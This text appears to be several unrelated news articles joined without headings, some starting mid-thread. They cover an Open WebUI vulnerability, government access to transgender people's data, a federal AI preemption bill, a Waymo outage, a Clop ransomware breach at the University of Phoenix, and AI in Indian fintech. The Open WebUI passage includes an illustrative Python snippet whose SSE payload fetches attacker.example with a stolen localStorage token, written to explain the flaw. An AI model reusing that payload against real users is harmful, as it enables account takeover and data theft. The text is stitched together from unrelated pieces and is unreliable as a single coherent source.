Talking about WebUI, Cato researchers said, “When a platform of this size becomes vulnerable, the impact isn’t just theoretical. It affects production environments managing research data, internal codebases, and regulated information.”
The flaw, tracked as CVE-2025-64496, was discovered by Cato Networks researchers. It affects Open WebUI versions 0.6.34 and earlier when the Direct Connections feature is enabled, and carries a severity rating of 7.3 out of 10.
The vulnerability exists in Direct Connections, a feature that allows users to connect Open WebUI to external OpenAI-compatible model servers. While built to support flexibility and self-hosted AI workflows, the feature can be exploited if a user is tricked into linking to a malicious server posing as a genuine AI endpoint.
Fundamentally, the vulnerability stems from a misplaced trust relationship between untrusted model servers and the user's browser session. A malicious server can send a tailored server-sent events (SSE) message that triggers execution of JavaScript code in the browser, letting a threat actor steal authentication tokens stored in local storage. With these tokens, the attacker gains full access to the user's Open WebUI account, exposing chats, API keys, uploaded documents, and other sensitive data.
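To make the attack shape concrete, the sketch below builds a server-sent events frame of the kind a malicious model server could stream back. The "execute" event name comes from the advisory's description of the patched events; the JSON payload structure and field names here are purely hypothetical illustrations, not Open WebUI's actual schema.

```python
# Illustrative sketch only: the general shape of an SSE frame a malicious
# model server could return. The "execute" event name is from the
# advisory; the payload fields below are hypothetical, not the real schema.
import json

def build_sse_event(event: str, data: dict) -> str:
    """Format a single SSE frame: an event name plus a JSON data line."""
    return f"event: {event}\ndata: {json.dumps(data)}\n\n"

# A benign server streams model tokens; a malicious one could instead
# stream script that, if executed in the victim's browser, reads the
# session token out of localStorage and sends it to an attacker.
malicious = build_sse_event(
    "execute",
    {"code": "fetch('https://attacker.example/?t=' + localStorage.getItem('token'))"},
)
print(malicious)
```

This is why the fix blocks the execute events entirely: once arbitrary script runs in the user's session, any token reachable from JavaScript is exposed.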
The consequences vary depending on the compromised user's privileges.
Open WebUI maintainers were informed of the issue in October 2025, and it was publicly disclosed in November 2025 after patch validation and CVE assignment. Open WebUI versions 0.6.35 and later block the malicious execute events, patching the user-facing threat.
Open WebUI’s security patch applies to v0.6.35 and newer versions, “which closes the user-facing Direct Connections vulnerability. However, organizations still need to strengthen authentication, sandbox extensibility and restrict access to specific resources,” according to Cato Networks researchers.
Recent legal and administrative actions in the United States are reshaping how personal data is recorded, shared, and accessed by government systems. For transgender and gender diverse individuals, these changes carry heightened risks, as identity records and healthcare information are increasingly entangled with political and legal enforcement mechanisms.
One of the most visible shifts involves federal identity documentation. Updated rules now require U.S. passport applicants to list sex as assigned at birth, eliminating earlier flexibility in gender markers. Courts have allowed this policy to proceed despite legal challenges. Passport data does not function in isolation. It feeds into airline systems, border controls, employment verification processes, financial services, and law enforcement databases. When official identification does not reflect an individual’s lived identity, transgender and gender diverse people may face repeated scrutiny, increased risk of harassment, and complications during travel or routine identity checks. From a data governance perspective, embedding such inconsistencies also weakens the accuracy and reliability of federal record systems.
Healthcare data has become another major point of concern. The Department of Justice has expanded investigations into medical providers offering gender related care to minors by applying existing fraud and drug regulation laws. These investigations focus on insurance billing practices, particularly the use of diagnostic codes to secure coverage for treatments. As part of these efforts, subpoenas have been issued to hospitals and clinics across the country.
Importantly, these subpoenas have sought not only financial records but also deeply sensitive patient information, including names, birth dates, and medical intake forms. Although current health privacy laws permit disclosures for law enforcement purposes, privacy experts warn that this exception allows personal medical data to be accessed and retained far beyond its original purpose. Many healthcare providers report that these actions have created a chilling effect, prompting some institutions to restrict or suspend gender related care due to legal uncertainty.
Other federal agencies have taken steps that further intensify concern. The Federal Trade Commission, traditionally focused on consumer protection and data privacy, has hosted events scrutinizing gender affirming healthcare while giving limited attention to patient confidentiality. This shift has raised questions about how privacy enforcement priorities are being set.
As in person healthcare becomes harder to access, transgender and gender diverse individuals increasingly depend on digital resources. Research consistently shows that the vast majority of transgender adults rely on the internet for health information, and a large proportion use telehealth services for medical care. However, this dependence on digital systems also exposes vulnerabilities, including limited broadband access, high device costs, and gaps in digital literacy. These risks are compounded by the government’s routine purchase of personal data from commercial data brokers.
Privacy challenges extend into educational systems as well. Courts have declined to establish a national standard governing control over students’ gender related data, leaving unresolved questions about who can access, store, and disclose sensitive information held by schools.
Taken together, changes to identity documents, aggressive access to healthcare data, and unresolved data protections in education are creating an environment of increased surveillance for transgender and gender diverse individuals. While some state level actions have successfully limited overly broad data requests, experts argue that comprehensive federal privacy protections are urgently needed to safeguard sensitive personal data in an increasingly digital society.
Besides this, the proposal would create a federal right for users to sue companies that misuse their personal data for AI model training without proper consent. The proposal allows statutory and punitive damages, attorneys' fees, and injunctions.
Blackburn is planning to officially introduce the bill this year to codify President Donald Trump’s push for “one federal rule book” for AI, according to the press release.
The legislative framework comes on the heels of Trump’s signing of an executive order aimed at blocking “onerous” AI laws at the state level and promoting a national policy framework for the technology.
To ensure a single, least-burdensome national standard rather than fifty inconsistent state ones, the directive required the administration to collaborate with Congress.
The president instructed Michael Kratsios, his science and technology adviser, and David Sacks, the White House special adviser for AI and cryptocurrency, to jointly propose federal AI legislation that would supersede any state laws conflicting with administration policy.
Blackburn stated in the Friday release that rather than advocating for AI amnesty, President Trump correctly urged Congress to enact federal standards and protections to address the patchwork of state laws that have impeded AI advancement.
The proposal would preempt state laws regulating the management of catastrophic AI risks. It would also largely preempt state digital-replica laws to establish a national standard for AI.
The proposal will not preempt “any generally applicable law, including a body of common law or a scheme of sectoral governance that may address” AI. The bill takes effect 180 days after enactment.
A large power outage across San Francisco during the weekend disrupted daily life in the city and temporarily halted the operations of Waymo’s self-driving taxi service. The outage occurred on Saturday afternoon after a fire caused serious damage at a local electrical substation, according to utility provider Pacific Gas and Electric Company. As a result, electricity was cut off for more than 100,000 customers across multiple neighborhoods.
The loss of power affected more than homes and businesses. Several traffic signals across the city stopped functioning, creating confusion and congestion on major roads. During this period, multiple Waymo robotaxis were seen stopping in the middle of streets and intersections. Videos shared online showed the autonomous vehicles remaining stationary with their hazard lights turned on, while human drivers attempted to maneuver around them, leading to traffic bottlenecks in some areas.
Waymo confirmed that it temporarily paused all robotaxi services in the Bay Area as the outage unfolded. The company explained that its autonomous driving system is designed to treat non-working traffic lights as four-way stops, a standard safety approach used by human drivers as well. However, officials said the unusually widespread nature of the outage made conditions more complex than usual. In some cases, Waymo vehicles waited longer than expected at intersections to verify traffic conditions, which contributed to delays during peak congestion.
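The four-way-stop fallback described above can be sketched as simple decision logic. This is an illustrative toy, not Waymo's actual driving policy; the state names and arrival-order parameter are invented for the example.

```python
# Illustrative sketch (not Waymo's real logic): an autonomous driving
# policy falling back to four-way-stop rules when a signal is dark,
# as described in the company's statement about the outage.

def intersection_action(signal_state: str, arrival_order: int) -> str:
    """Decide behavior at an intersection.

    signal_state: "green", "red", "yellow", or "dark" (power outage).
    arrival_order: 0 if this vehicle arrived first among waiting cars.
    """
    if signal_state == "green":
        return "proceed"
    if signal_state in ("red", "yellow"):
        return "stop"
    # Dark signal: treat the intersection as a four-way stop.
    # Come to a full stop, then proceed only when it is this car's turn.
    return "proceed_after_stop" if arrival_order == 0 else "wait"

print(intersection_action("dark", 0))  # first to arrive: stop, then go
print(intersection_action("dark", 2))  # others arrived first: keep waiting
```

During a citywide outage, nearly every intersection falls into the "dark" branch at once, which is why verification delays at individual intersections compounded into wider congestion.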
City authorities took emergency measures to manage the situation. Police officers, firefighters, and other personnel were deployed to direct traffic manually at critical intersections. Public transportation services were also affected, with some commuter train lines and stations experiencing temporary shutdowns due to the power failure.
Waymo stated that it remained in contact with city officials throughout the disruption and prioritized safety during the incident. The company said most rides that were already in progress were completed successfully, while other vehicles were either safely pulled over or returned to depots once service was suspended.
By Sunday afternoon, PG&E reported that power had been restored to the majority of affected customers, although thousands were still waiting for electricity to return. The utility provider said full restoration was expected by Monday.
Following the restoration of power, Waymo confirmed that its ride-hailing services in San Francisco had resumed. The company also indicated that it would review the incident to improve how its autonomous systems respond during large-scale infrastructure failures.
Waymo operates self-driving taxi services in several U.S. cities, including Los Angeles, Phoenix, and Austin, and plans further expansion. The San Francisco outage has renewed discussions about how autonomous vehicles should adapt during emergencies, particularly when critical urban infrastructure fails.
It was orchestrated by the Clop ransomware group, a financially motivated cybercriminal syndicate well known for extorting large sums of money from its victims. During the attack, the personal records of nearly 3.5 million individuals, including students, faculty, administrative staff, and third-party suppliers, were compromised.
Established in 1976, the university has grown over the last five decades into a major national educational provider. It enrolls approximately 82,700 students and is supported by a workforce of 3,400 employees.
Of these, nearly 2,300 are academics. The breach was officially confirmed by the institution through a written statement posted on its website in early December, while its parent organization, Phoenix Education Partners, formally notified federal regulators of the incident through a mandatory Form 8-K filing with the U.S. Securities and Exchange Commission, also in early December.
The disclosure is the first authoritative acknowledgment of a breach that experts say may have profound implications for identity protection, financial security, and institutional accountability in the higher education sector. It also highlights how substantial the risks associated with critical enterprise software and delayed threat detection can be.
The breach at the University of Phoenix illustrates this. An internal incident briefing indicates the intrusion took place over a period of nine days, between August 13 and August 22, 2025. The attackers exploited a previously unreported vulnerability in Oracle's E-Business Suite (EBS), a financial and administrative platform widely used by large organizations.
Through this vulnerability, the threat actors gained unauthorized access to, and exfiltrated, highly sensitive information belonging to 3,489,274 individuals, including students, alumni, professors, and external suppliers and service providers. The university did not discover the compromise until November 21, 2025, more than three months after it began unfolding in August.
The discovery reportedly coincided with public signals from the Cl0p ransomware group, which had listed the institution on its leak site. Phoenix Education Partners formally disclosed the incident in a regulatory Form 8-K filing submitted to the U.S. Securities and Exchange Commission on December 2, 2025, followed by a broader public notification effort on December 22 and 23 of the same year.
Delayed detection is not unusual for sophisticated cyber intrusions, but in this case it significantly complicated the institution's response, shifting its focus from immediate containment to regulatory compliance, reputational risk management, and identity protection for the millions of people affected.
In response to the breach, the University of Phoenix has implemented a comprehensive identity protection program offering affected individuals 12 months of credit monitoring, dark web surveillance, identity theft recovery assistance, and an identity theft reimbursement policy covering up to $1 million.
The institution has not formally admitted liability for the incident, but there is strong evidence that it is part of a larger extortion campaign by the Clop ransomware group. Security analysts indicate Clop exploited a zero-day vulnerability (CVE-2025-61882) in Oracle's E-Business Suite in early August 2025 and used it in similar fashion to steal sensitive data from other prominent U.S. universities, including Harvard University and the University of Pennsylvania, both of which confirmed that students' and staff's personal records were accessed by an unauthorized third party through compromised Oracle systems.
Clop has a proven history of orchestrating mass data theft, having targeted managed file transfer platforms including GoAnywhere, Accellion FTA, MOVEit, Cleo, and Gladinet CentreStack. The U.S. Department of State has announced a reward of up to $10 million for information identifying a foreign government as the source of the ransomware collective's operations.
The attack has disrupted the broader business environment, and it fits a troubling pattern: other higher-education institutions have also been victimized in the same wave of incidents. Following breaches involving voice phishing, some universities have revealed that their development, alumni, and administrative systems were accessed without authorization and that donor and community information was exfiltrated. The incident also resembles other recently reported Oracle E-Business Suite (EBS) compromises across U.S. universities.
These include Harvard University and the University of Pennsylvania, both of which have admitted that systems used to manage sensitive student and staff data were accessed without authorization. Cybersecurity leaders note that universities increasingly resemble the risk profile of sectors such as healthcare: centralized ecosystems housing large amounts of long-term personal data.
When student enrollment records, financial aid records, payroll infrastructure, and donor databases are all kept in the same place, a single point of compromise can expose years, even decades, of accumulated personal and financial information.
These large, long-standing repositories make colleges uniquely attractive targets, and the impact of a breach is measured not only in records lost but in the length of exposure and the size of the population exposed.
The breach at the University of Phoenix adds to a growing body of evidence that U.S. colleges and universities are being targeted by an increasingly coordinated wave of cyberattacks. Recent disclosures from leading academic institutions, including Harvard University, the University of Pennsylvania, and Princeton University, show that the threat landscape extends beyond ransomware operations, with voice-phishing campaigns also used to infiltrate systems supporting alumni engagement and donor relations.
The developments raise concerns about institutional privacy as well. The State Department's reward offer reflects growing concern within federal agencies that ransomware groups' financial motivations may, in some cases, intersect with broader geopolitical strategies.
The incident has reminded university administrators of a structural vulnerability in modern higher education: a reliance on sprawling, interconnected enterprise platforms that centralize academic, administrative, and financial operations, creating an environment where the effects of a single breach can cascade across multiple stakeholder groups.
Attackers' priorities have shifted markedly, away from outright disrupting systems and toward covertly extracting data for extortion. As a result, cybersecurity experts warn that breaches involving the theft of millions of records may no longer be outliers but a foreseeable and recurring concern.
This trend presents institutions with two significant challenges: intensified regulatory scrutiny, and the more intangible task of preserving trust among students, faculty, and staff whose personal information institutions are ethically and contractually bound to protect.
In light of the breach, the higher-education sector faces a pivotal moment, one that reinforces the need for universities to evolve from open knowledge ecosystems into hardened digital enterprises.
Identity protection support may help alleviate downstream damage, but cybersecurity experts hold that long-term resilience requires structural reform rather than episodic responses.
The information security field is moving toward layered defenses for legacy platforms, quicker patch cycles for vulnerabilities, and continuous network monitoring capable of identifying anomalous access patterns in real time.
Policy analysts emphasize the importance of institutional transparency during crisis periods, noting that early communication combined with clear remediation roadmaps helps limit misinformation and recover stakeholder confidence.
Beyond technical safeguards, industry leaders advocate expanded security awareness programs to strengthen institutional perimeters, since even advanced tools struggle against threats like social engineering and phishing.
In an era of unprecedented digital access, in which data has become as valuable as degrees, safeguarding information is no longer a supplemental responsibility for universities but a fundamental institutional mandate, one that will help determine the credibility, compliance, and trust they rely on in the years to come.
“We're already seeing traditional boundaries blur: payments, lending, embedded finance, and banking capabilities are coming closer together as players look to build more integrated and efficient models. While payments continue to be powerful for driving access and engagement, long-term value will come from combining scale with operational efficiency across the financial stack,” said Ramki Gaddapati, Co-Founder, APAC CEO and Global CTO, Zeta.
India’s fintech industry is preparing to enter 2026 with a new compliance-first mindset, and Artificial Intelligence (AI) is emerging as a critical tool in this transformation, helping firms strengthen fraud detection, streamline regulatory processes, and enhance customer trust.
According to Reserve Bank of India (RBI) data, digital payment volumes crossed 180 billion transactions in FY25, powered largely by the Unified Payments Interface (UPI) and embedded payment systems across commerce, mobility, and lending platforms.
Yet, regulators and industry leaders are increasingly concerned about operational risks and fraud. The RBI, along with the Bank for International Settlements (BIS), has highlighted vulnerabilities in digital payment ecosystems, urging fintechs to adopt stronger compliance frameworks.
Artificial intelligence is set to play a central role in this compliance-first era. Fintech firms are deploying AI to:
- Detect and prevent fraudulent transactions in real time
- Automate compliance reporting and monitoring
- Personalize customer experiences while maintaining data security
- Analyze risk patterns across lending and investment platforms
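The first of those use cases, real-time fraud screening, can be sketched in miniature. This is a deliberately simplified, rule-based toy; the thresholds, field names, and rules below are invented for illustration, while production systems rely on learned models and far richer signals.

```python
# Minimal illustrative sketch of real-time transaction screening of the
# kind described above. All thresholds and rules are invented examples.
from dataclasses import dataclass

@dataclass
class Txn:
    amount: float     # transaction amount
    hour: int         # hour of day, 0-23
    new_payee: bool   # first payment to this payee?
    daily_avg: float  # customer's trailing average transaction size

def fraud_score(t: Txn) -> float:
    """Return a 0-1 risk score from simple additive rules."""
    score = 0.0
    if t.amount > 10 * t.daily_avg:  # unusually large for this customer
        score += 0.5
    if t.new_payee:                  # first-time payee adds risk
        score += 0.3
    if t.hour < 5:                   # late-night activity adds risk
        score += 0.2
    return min(score, 1.0)

def should_block(t: Txn, threshold: float = 0.7) -> bool:
    """Block (or escalate) transactions whose score crosses the threshold."""
    return fraud_score(t) >= threshold

risky = Txn(amount=95_000, hour=3, new_payee=True, daily_avg=2_000)
print(should_block(risky))  # all three rules fire, score 1.0 -> True
```

Real deployments replace the hand-written rules with trained models and stream features from live transaction data, but the shape is the same: score each transaction as it arrives and gate it against a risk threshold.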
The sector is also diversifying beyond payments. Fintechs are moving deeper into credit, wealth management, and banking-related services, areas that demand stricter oversight. This diversification allows firms to capture new revenue streams and broaden their customer base, but it also exposes them to heightened regulatory scrutiny and the need for more robust governance structures.
“The DPDP Act is important because it protects personal data and builds trust. Without compliance, organisations face penalties, data breaches, customer loss, and reputational damage. Following the law improves credibility, strengthens security, and ensures responsible data handling for sustained business growth,” said Neha Abbad, co-founder, CyberSigma Consulting.